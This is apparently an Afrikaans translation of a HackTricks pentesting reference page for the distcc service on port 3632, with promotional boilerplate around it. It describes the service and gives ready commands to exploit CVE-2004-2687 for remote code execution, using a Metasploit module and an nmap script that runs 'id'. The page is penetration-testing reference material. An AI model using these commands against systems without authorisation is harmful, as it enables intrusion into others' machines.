3632 - Pentesting distcc

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
Kry die amptelike PEASS & HackTricks swag
Ontdek Die PEASS Familie, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

Basiese Inligting

Distcc is 'n instrument wat die kompileringproses verbeter deur die onbenutte verwerkingkrag van ander rekenaars in die netwerk te benut. Wanneer distcc op 'n masjien opgestel is, is hierdie masjien in staat om sy kompileringstake na 'n ander stelsel te versprei. Hierdie ontvangerstelsel moet die distccd daemon hardloop en 'n verenigbare kompilator geïnstalleer hê om die gestuurde kode te verwerk.

Verstekpoort: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Uitbuiting

Kyk of dit vatbaar is vir CVE-2004-2687 om arbitrêre kode uit te voer:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Ek dink nie Shodan detect hierdie diens nie.

Hulpbronne

Pos geskep deur Álex B (@r1p)

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy wil sien jou maatskappy geadverteer in HackTricks of HackTricks aflaai in PDF-formaat Kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek Die PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

Previous3389 - Pentesting RDP Next3690 - Pentesting Subversion (svn server)

Last updated 1 month ago